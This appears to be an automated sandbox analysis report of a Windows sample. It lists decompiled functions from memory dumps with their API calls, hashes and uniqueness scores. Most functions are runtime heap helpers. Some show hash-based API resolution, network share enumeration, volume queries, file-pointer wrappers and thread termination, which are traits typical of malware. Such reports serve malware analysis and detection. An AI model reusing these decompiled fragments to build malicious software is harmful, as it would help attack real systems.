Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: InformationLibraryLoadToken
String ID:
API String ID: 481147872-0
Opcode ID: 688b4a966689b8b2293142fa00e5910d0000e1ff4051a55a139da06439f23876
Instruction ID: 39f8e4c7a57290753a0ee6941be972336272bd3ace1dabfc1d3f81ba4de230e3
Opcode Fuzzy Hash: 688b4a966689b8b2293142fa00e5910d0000e1ff4051a55a139da06439f23876
Instruction Fuzzy Hash: 0A01F5375446147AE625A7E19C56EBF3368CF40720F10016EFA41BA1C0EE79EE0586A9

Uniqueness

Uniqueness Score: 0.10%

Function 00425B20, Relevance: 1.6, APIs: 1, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00425A57: LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000000,?,0044B6B4,?,00425B62,?,?,00000000,?,?,?,00425DB1), ref: 00425A95
Part of subcall function 00425A57: GetLastError.KERNEL32(?,00000000,?,0044B6B4,?,00425B62,?,?,00000000,?,?,?,00425DB1,00000006,00438F54,0043E5F8), ref: 00425AA1
Part of subcall function 00425A57: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00425AD7
Part of subcall function 00425A57: FreeLibrary.KERNEL32(00000000,?,00000000,?,0044B6B4,?,00425B62,?,?,00000000,?,?,?,00425DB1,00000006,00438F54), ref: 00425AFD

GetProcAddress.KERNEL32(00000000,?,00000000,?,?,?,00425DB1,00000006,00438F54,0043E5F8,0043E600,00000000,?,004251EA,0044B834,000000FF), ref: 00425B6C

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID:
API String ID: 2559590344-0
Opcode ID: 49dacbcd84175248c29211437e496a9638ee74001e0d61eca5920ac1688c83a7
Instruction ID: f844dbc10a74f0d1f5cfc81290be0b1d2a221c7f9fa551499e1ad43842108d82
Opcode Fuzzy Hash: 49dacbcd84175248c29211437e496a9638ee74001e0d61eca5920ac1688c83a7
Instruction Fuzzy Hash: 7A01D237704A315FAB268F2DFC4495B37A6EBC13707654122FA04CB294EB34E8018B89

Uniqueness

Uniqueness Score: 0.03%

Function 0042D701, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0042D701(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00420EFE(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00425E52(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E004214E2(0);
				return _t35;
			}

0x0042d707
0x0042d70e
0x0042d713
0x0042d717
0x0042d71e
0x0042d724
0x0042d724
0x0042d72a
0x0042d72c
0x0042d72f
0x0042d72f
0x0042d732
0x0042d734
0x0042d73a
0x0042d73e
0x0042d743
0x0042d747
0x0042d749
0x0042d74c
0x0042d752
0x0042d759
0x0042d75d
0x0042d761
0x0042d764
0x0042d767
0x0042d767
0x0042d76b
0x0042d76e
0x0042d720
0x0042d720
0x0042d720
0x0042d770
0x0042d77d

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

_free.LIBCMT ref: 0042D770

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

Part of subcall function 00425E52: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00425E92

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Heap$AllocateCountCriticalErrorFreeInitializeLastSectionSpin_free
String ID:
API String ID: 3559933012-0
Opcode ID: be2cf264c0025f763e19cbf8f13c2fdaaf2ff12f96b5424d99af027d918a83a1
Instruction ID: a1290c592b74736c5a1f8fa7631cb7302bf8d21bedac147c13aed2131e2ef212
Opcode Fuzzy Hash: be2cf264c0025f763e19cbf8f13c2fdaaf2ff12f96b5424d99af027d918a83a1
Instruction Fuzzy Hash: A6014E72B043665BC330DF59E88599AFB98EB453B0F51026EF448A76C0E7746C10CBE8

Uniqueness

Uniqueness Score: 0.14%

Function 0042D701, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00420F3F

_free.LIBCMT ref: 0042D770

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

Part of subcall function 00425E52: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00425E92

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: Heap$AllocateCountCriticalErrorFreeInitializeLastSectionSpin_free
String ID:
API String ID: 3559933012-0
Opcode ID: 53a8fbe440e540d84e7b889394fa97285382745b37b9bb24cc65ac8e4cdfc7a6
Instruction ID: a1290c592b74736c5a1f8fa7631cb7302bf8d21bedac147c13aed2131e2ef212
Opcode Fuzzy Hash: 53a8fbe440e540d84e7b889394fa97285382745b37b9bb24cc65ac8e4cdfc7a6
Instruction Fuzzy Hash: A6014E72B043665BC330DF59E88599AFB98EB453B0F51026EF448A76C0E7746C10CBE8

Uniqueness

Uniqueness Score: 0.14%

Function 00420EFE, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420EFE(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x44e1a8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00424D3F();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0041A8EF(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00422365(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00420f04
0x00420f09
0x00420f17
0x00420f17
0x00420f1d
0x00420f1f
0x00420f1f
0x00420f36
0x00420f3f
0x00420f47
0x00000000
0x00000000
0x00420f27
0x00420f29
0x00420f4b
0x00420f50
0x00420f56
0x00000000
0x00420f56
0x00420f32
0x00420f34
0x00000000
0x00000000
0x00420f34
0x00000000
0x00420f36
0x00420f0f
0x00420f15
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 31665a72bd5c9901b6e0cf0b5b3c5992e59086d60c5a3f637cbcfdeb78e19538
Instruction ID: 8e39456f7fc195d4a566ca64e395227f526b01fafbd043534a078109c64d7b6e
Opcode Fuzzy Hash: 31665a72bd5c9901b6e0cf0b5b3c5992e59086d60c5a3f637cbcfdeb78e19538
Instruction Fuzzy Hash: 45F0503138413466DB306B22BE05A577BD8AF81770B468027AC0CD6183DABCDC0192ED

Uniqueness

Uniqueness Score: 0.01%

Function 00420EFE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00420F3F

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ce13b979fd9d73cbc3e6fb56b3c0fb026560b7ebf9db589f7baa9c7dbbabe5d9
Instruction ID: 8e39456f7fc195d4a566ca64e395227f526b01fafbd043534a078109c64d7b6e
Opcode Fuzzy Hash: ce13b979fd9d73cbc3e6fb56b3c0fb026560b7ebf9db589f7baa9c7dbbabe5d9
Instruction Fuzzy Hash: 45F0503138413466DB306B22BE05A577BD8AF81770B468027AC0CD6183DABCDC0192ED

Uniqueness

Uniqueness Score: 0.01%

Function 00405E80, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E80(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t32;
				void* _t33;

				_t33 = __ecx; // executed
				_t22 = E0041500C(__edx, __eflags, 0x2c); // executed
				_t32 = _t22;
				if(_t32 == 0) {
					_t32 = 0;
					__eflags = 0;
				} else {
					 *((intOrPtr*)(_t32 + 4)) = 7;
					 *((intOrPtr*)(_t32 + 8)) = 0;
					 *((intOrPtr*)(_t32 + 0xc)) = 0;
					 *((intOrPtr*)(_t32 + 0x10)) = 0;
					 *_t32 = 0x43761c;
					 *((intOrPtr*)(_t32 + 0x14)) = 0;
					 *((intOrPtr*)(_t32 + 0x18)) = 0;
					 *((intOrPtr*)(_t32 + 0x1c)) = 0;
					 *((intOrPtr*)(_t32 + 0x20)) = 0;
					 *((short*)(_t32 + 0x24)) = 0;
					 *((intOrPtr*)(_t32 + 0x28)) = 0;
				}
				 *((intOrPtr*)(_t32 + 0x10)) =  *((intOrPtr*)(_t33 + 4));
				_t25 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 4)) + 0xc));
				if(_t25 != 0) {
					 *((intOrPtr*)(_t32 + 0xc)) = _t25;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t33 + 4)) + 0xc)) + 0x10)) = _t32;
				}
				_t26 =  *((intOrPtr*)(_t33 + 4));
				 *((intOrPtr*)(_t26 + 0xc)) = _t32;
				 *((intOrPtr*)(_t33 + 4)) = _t32;
				return _t26;
			}

0x00405e83
0x00405e85
0x00405e8a
0x00405e91
0x00405edc
0x00405edc
0x00405e93
0x00405e95
0x00405e9c
0x00405ea3
0x00405eaa
0x00405eb1
0x00405eb7
0x00405ebe
0x00405ec5
0x00405ecc
0x00405ed3
0x00405ed7
0x00405ed7
0x00405ee1
0x00405ee7
0x00405eec
0x00405eee
0x00405ef7
0x00405ef7
0x00405efa
0x00405efd
0x00405f00
0x00405f04

APIs

new.LIBCMT ref: 00405E85

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 9305f3cb7b9a574fef048e693d7af4e6023e853a1978f05ac5f39f7372f66e51
Instruction ID: 1d98131005730c3cf5fc5f22e78e66ab48590c6dbbcd9dec6270e3dd92245fa0
Opcode Fuzzy Hash: 9305f3cb7b9a574fef048e693d7af4e6023e853a1978f05ac5f39f7372f66e51
Instruction Fuzzy Hash: E9016DB4A006028FE358CF19C558702FBE0BB48314F15C6AAD4598F752D3B9E985CFC4

Uniqueness

Uniqueness Score: 1.47%

Function 00403FA7, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Part of subcall function 00404C2E: VirtualAlloc.KERNELBASE(00000000,00001002,00003000,00000004,00000000,?), ref: 00404C49
Part of subcall function 00404C2E: WNetOpenEnumW.MPR(00000003,00000001,00000000,00000000,00000000), ref: 00404C82
Part of subcall function 00404C2E: WNetEnumResourceW.MPR(00000000,00000080,00000000,00001000), ref: 00404CF1
Part of subcall function 00404C2E: WNetOpenEnumW.MPR(00000002,00000001,00000000,00000000,00000000), ref: 00404D1B
Part of subcall function 00404C2E: WNetEnumResourceW.MPR(00000000,00000080,00000000,00001000), ref: 00404D8C
Part of subcall function 00404C2E: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404DA5

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

ExitThread.KERNEL32 ref: 00404000

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: EnumVirtual$AllocFreeOpenResource$ExitLibraryLoadThread
String ID:
API String ID: 1946016980-0
Opcode ID: f91048409b9124d61674ee1d070483ae7ef6317099e9d3615f22154d9dc9644d
Instruction ID: e40193b02c2a6157e979aa1ddb50c3fe600fdb69a952182ae83585d358e7af17
Opcode Fuzzy Hash: f91048409b9124d61674ee1d070483ae7ef6317099e9d3615f22154d9dc9644d
Instruction Fuzzy Hash: FBF0E971948200BBE6103B928C4BFAF3A6CDB41B54F10002EF504795C1EEF66941426E

Uniqueness

Uniqueness Score: 0.19%

Function 0042151C, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042151C(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0041A8EF(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x44e1a8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00424D3F();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E00422365(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00421522
0x00421528
0x0042155a
0x0042155f
0x00421565
0x00000000
0x00421565
0x0042152c
0x0042152e
0x0042152e
0x00421545
0x0042154e
0x00421556
0x00000000
0x00000000
0x00421536
0x00421538
0x00000000
0x00000000
0x00421541
0x00421543
0x00000000
0x00000000
0x00421543
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,0041370C,?,?,00416C35,?,?,1FFFFFFF,00000008,?,00413478,0041370C,?,?,?,?), ref: 0042154E

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2bab73425d5492fe956b221716b918968251976781573b44103c6510e025e3a3
Instruction ID: fdcad45d0bdd15596d8939c410a8aa874b5e5e9c65ca33b8c210380ba7438064
Opcode Fuzzy Hash: 2bab73425d5492fe956b221716b918968251976781573b44103c6510e025e3a3
Instruction Fuzzy Hash: ADE0E5313011307AE6213B26BC00B5B7758AFE13E0F8401ABFD07922B0DA2CCD8191ED

Uniqueness

Uniqueness Score: 0.01%

Function 0042151C, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0042154E

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3a7949666db715ca2efbdfeba05c661954ad727daf3cf5aa58185a167937cbde
Instruction ID: fdcad45d0bdd15596d8939c410a8aa874b5e5e9c65ca33b8c210380ba7438064
Opcode Fuzzy Hash: 3a7949666db715ca2efbdfeba05c661954ad727daf3cf5aa58185a167937cbde
Instruction Fuzzy Hash: ADE0E5313011307AE6213B26BC00B5B7758AFE13E0F8401ABFD07922B0DA2CCD8191ED

Uniqueness

Uniqueness Score: 0.01%

Function 00425FD4, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00425B20: GetProcAddress.KERNEL32(00000000,?,00000000,?,?,?,00425DB1,00000006,00438F54,0043E5F8,0043E600,00000000,?,004251EA,0044B834,000000FF), ref: 00425B6C

SystemFunction036.ADVAPI32 ref: 00426007

Part of subcall function 0042156A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00421586

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: AddressFeatureFunction036PresentProcProcessorSystem
String ID:
API String ID: 4270511719-0
Opcode ID: e2de10104113f68fd819baa930a4e48dd1e0df3030fda1db724ee8d0aa497800
Instruction ID: b90bc602ef9ce6e1775339af71c175b232df5b20cfefbf1323fc9ce23491a44c
Opcode Fuzzy Hash: e2de10104113f68fd819baa930a4e48dd1e0df3030fda1db724ee8d0aa497800
Instruction Fuzzy Hash: 1FE0C2317412383786203693AC0AE9BBE05CB80BA0F511073BD0865AE2DAB98C5093D9

Uniqueness

Uniqueness Score: 2.84%

Function 00425CD8, Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00425B20: GetProcAddress.KERNEL32(00000000,?,00000000,?,?,?,00425DB1,00000006,00438F54,0043E5F8,0043E600,00000000,?,004251EA,0044B834,000000FF), ref: 00425B6C

TlsAlloc.KERNEL32 ref: 00425D0C

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: AddressAllocProc
String ID:
API String ID: 2924745751-0
Opcode ID: 5bf7b52a9035d6da62996c6e90be7de04acffa0db1d88b73295c312451715eea
Instruction ID: 0bf3cccd3a13974d3e05839888c2c9bfa5e263b8ef4f6910b13bd3fe1ef2280c
Opcode Fuzzy Hash: 5bf7b52a9035d6da62996c6e90be7de04acffa0db1d88b73295c312451715eea
Instruction Fuzzy Hash: C7E0C23278563873D62232D27C0AB9FBE088BA4BA0F545027F90452390A9B94A0196DD

Uniqueness

Uniqueness Score: 0.16%

Function 001E3A94, Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 001E3AB7

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9d2e032894b469e324e7c0e759b2d510a046f3fa4b2792a26fedbf2a29184a52
Instruction ID: fe6660175cbbc6d9a82bbaf34abf5ad500b8713ad858917e5182007a887ddaed
Opcode Fuzzy Hash: 9d2e032894b469e324e7c0e759b2d510a046f3fa4b2792a26fedbf2a29184a52
Instruction Fuzzy Hash: E6E07E7590020CAFCF01DF95D94589DBBB5FB08200F008199ED54A7251D7319A20EF51

Uniqueness

Uniqueness Score: 0.03%

Function 0040956C, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040956C(WCHAR* _a4, WCHAR* _a8, long _a12, DWORD* _a16, DWORD* _a20, DWORD* _a24, WCHAR* _a28, long _a32) {
				int _t10;
				void* _t11;

				E004010BB(_t11, 1, 0x67ecde81);
				_t10 = GetVolumeInformationW(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t10;
			}

0x00409576
0x00409595
0x00409598

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

GetVolumeInformationW.KERNELBASE(00000400,00000604,00000608,00000600,00000100,00000200,00000000,0040B218,?,0040B218,00000000,00000200,00000100,00000600,00000608,00000604), ref: 00409595

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: InformationLibraryLoadVolume
String ID:
API String ID: 2832751768-0
Opcode ID: 1b675deef9471ba599dd585b62d478906a9d79fdfed3ac587b0dde1df347700a
Instruction ID: 0372d12f4dfbd06b02b624c199203f965499dfbd1d66da588ce0a58a0f2da243
Opcode Fuzzy Hash: 1b675deef9471ba599dd585b62d478906a9d79fdfed3ac587b0dde1df347700a
Instruction Fuzzy Hash: BFD0423604424DBFDF069EC1DD42DDE3F66EB08754F104115FA1814061D677D971AB95

Uniqueness

Uniqueness Score: 0.02%

Function 00401650, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0040166C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 8f98deeabe7734a0260b3289326389fdd28dec8aef1ca66a9bcd2391762e6b29
Instruction ID: 05fab28331bca322d1c996acae150dfd8f93be0c0ef669ff9971c00ceb7c8bcd
Opcode Fuzzy Hash: 8f98deeabe7734a0260b3289326389fdd28dec8aef1ca66a9bcd2391762e6b29
Instruction Fuzzy Hash: 63D05EF29242119BC324DF58C800886B3E89F6A314715DA2BF0C4E7200F374E88087A8

Uniqueness

Uniqueness Score: 16.53%

Function 001E3894, Relevance: 1.5, APIs: 1, Instructions: 16threadUNIQUE

Download Yara Rule

APIs

Thread32First.KERNEL32(?,?), ref: 001E38B1

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID: FirstThread32
String ID:
API String ID: 1064138110-0
Opcode ID: 94753fe6f4442dffb6c449813b4059df5cd74a5fc0ee49a69b12129ff8c79f1f
Instruction ID: eca86af41c0860c226d4abfd4e6f75c2a7a59b52afdd3ae5f09d2688cc7e27c5
Opcode Fuzzy Hash: 94753fe6f4442dffb6c449813b4059df5cd74a5fc0ee49a69b12129ff8c79f1f
Instruction Fuzzy Hash: EEE02D79D0020CAF8F45EFA9D54589CBBB5EB18210F1081AAEC54A7351EA31AA64DB91

Uniqueness

Uniqueness Score: 37.75%

Function 001E3804, Relevance: 1.5, APIs: 1, Instructions: 16threadUNIQUE

Download Yara Rule

APIs

Thread32Next.KERNEL32(?,?), ref: 001E3821

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID: NextThread32
String ID:
API String ID: 1159766829-0
Opcode ID: 1601edc6c9f744777ca5abfa241671375b323746b1fcc46423dfacf06f63242e
Instruction ID: 44f2b528776189f0ca1bea03a38ccc9e4c11cd3ae9a715d305f45584187e0b0e
Opcode Fuzzy Hash: 1601edc6c9f744777ca5abfa241671375b323746b1fcc46423dfacf06f63242e
Instruction Fuzzy Hash: 5EE0BD38D0020CEF8B00EFA9C54589CBBB4EB08200F0081AAEC14A7310EA31AA20DB91

Uniqueness

Uniqueness Score: 23.02%

Function 001E3834, Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(?,?), ref: 001E3851

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 45e9bebe351f6d77615ea9ee4f971fe682038a464332b285b57f309426f25420
Instruction ID: d1789ce03c86fec11f9c6b3621dc1ffc4b6e39098f7b9d699f5aac9bd02f1b45
Opcode Fuzzy Hash: 45e9bebe351f6d77615ea9ee4f971fe682038a464332b285b57f309426f25420
Instruction Fuzzy Hash: D2E0BD38D0020CEF8B00EFA9C44589CBBB4FB08200F0081AAEC14A7310EA31AA20DB91

Uniqueness

Uniqueness Score: 1.64%

Function 001E38C4, Relevance: 1.5, APIs: 1, Instructions: 16processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(?,?), ref: 001E38E1

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 9a78794fdf30ae9b24edb1b6b2f534bd32dd2ac2499819a386348227527e353b
Instruction ID: fc7356c0ccf77264a14992c3ddd015f12064580d90240414018bfa915265f9e2
Opcode Fuzzy Hash: 9a78794fdf30ae9b24edb1b6b2f534bd32dd2ac2499819a386348227527e353b
Instruction Fuzzy Hash: 65E02D79D0020CEF8B45EFA9D54589CBFB5EB18210F1081AAEC54A7351EA31AA64DB91

Uniqueness

Uniqueness Score: 0.01%

Function 00401608, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401608(void* _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, long _a16, intOrPtr _a20) {
				int _t7;
				void* _t8;

				E004010BB(_t8, 1, 0x380e992a);
				_push(_a20);
				_t7 = SetFilePointerEx(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}

0x00401612
0x00401619
0x00401628
0x0040162b

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

SetFilePointerEx.KERNELBASE(00000000,000000FF,FFFFFDE4,00000000,00401789,?,00401789,00000000,FFFFFDE4,000000FF,00000000,00000002), ref: 00401628

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
